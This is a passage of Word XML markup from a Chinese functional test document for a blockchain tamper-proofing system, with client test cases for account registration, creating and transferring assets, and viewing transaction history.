      <w:bookmarkStart w:id="306" w:name="_Toc36573237"/>
      <w:bookmarkStart w:id="307" w:name="_Toc36630323"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>区块链防篡改</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w14:paraId="32258BF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="_Toc21249"/>
      <w:bookmarkStart w:id="309" w:name="_Toc36487934"/>
      <w:bookmarkStart w:id="310" w:name="_Toc36573238"/>
      <w:bookmarkStart w:id="311" w:name="_Toc36630324"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="6576D8FE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc36487935"/>
      <w:r w:rsidRPr="00536672">
        <w:t>注册账号</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>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16B3F666" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B6F81CF"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1FD3AD81" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>注册账号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3D35A347" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110053F1"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54A0F075" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在客户端页面注册账号，并登陆系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0A74A526" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC5AE6A"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33C0E742"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15AA1FF9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F051EF"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19842155" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>地址：192.168.1.239:8100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CFF75BE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="04B5B86E" wp14:editId="4A70F6CD">
                  <wp:extent cx="4104005" cy="1967230"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13970"/>
                  <wp:docPr id="107" name="图片 107" descr="Cli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lient1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1967230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F54FF3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“申请权限”，申请注册。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD0EC3B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6AB90211" wp14:editId="56914015">
                  <wp:extent cx="4104005" cy="1967230"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13970"/>
                  <wp:docPr id="108" name="图片 108" descr="Cli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lient1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1967230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1D5453C7" wp14:editId="471EAD38">
                  <wp:extent cx="4104005" cy="1953895"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
                  <wp:docPr id="109" name="图片 109" descr="Cli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lient2"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1953895"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C034CE8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>注册成功之后，登录已注册账号。进入主页。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1C6C3F71" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A995612"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2787B660" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>注册成功之后，登录已注册账号</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入主页。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="337CEF72" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCA9F39"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1B4B515C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFAA4A8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc36487936"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增、转移资产</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>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15A90EC8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C8B9C5E"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72FAAC18" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="314" w:name="_Toc17600"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增、转移资产</w:t>
            </w:r>
            <w:bookmarkEnd w:id="314"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="092BBD7A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11A8BE17"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11912B03" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增资产，并进行资产转移</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="74B2899B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E10AB50"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10890C88"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425E9C3D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0055F51A"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7CA8883C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主页主要展示交易列表，资产转移情况。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="687F62ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7EE81275" wp14:editId="28191FE5">
                  <wp:extent cx="4175760" cy="1878965"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="635"/>
                  <wp:docPr id="110" name="图片 110" descr="Cli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lient3"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4175760" cy="1878965"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A03135B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“新建资产”为当前用户创建资产。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630A9486" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="66E964BD" wp14:editId="22CA8A9E">
                  <wp:extent cx="4183380" cy="1890395"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="14605"/>
                  <wp:docPr id="111" name="图片 111" descr="clie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lient4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4183380" cy="1890395"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F0CC4C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>创建好的资产会显示在交易列表中。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDA3D80" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击对应资产后的“转移资产”，将资产由现拥有者转移到所指定的另一位用户。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7632B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4F348EB6" wp14:editId="2E53C89D">
                  <wp:extent cx="4211955" cy="1917065"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="13335"/>
                  <wp:docPr id="112" name="图片 112" descr="clie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lient5"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4211955" cy="1917065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="778365F2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看资产交易历史记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06EAF738" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击对应资产，弹出框显示资产交易历史记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1ACE05" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5F440979" wp14:editId="502C4A03">
                  <wp:extent cx="4179570" cy="1905000"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="0"/>
                  <wp:docPr id="113" name="图片 113" descr="clie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lient6"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4179570" cy="1905000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="57A3E64F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429CA4E7"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0E6F1C78"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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增资产成功，转移资产成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6613915D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C73FD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E7E39C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17BC97BF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc36487937"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户信息管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>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012B065A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="391630A3"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2354A42D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
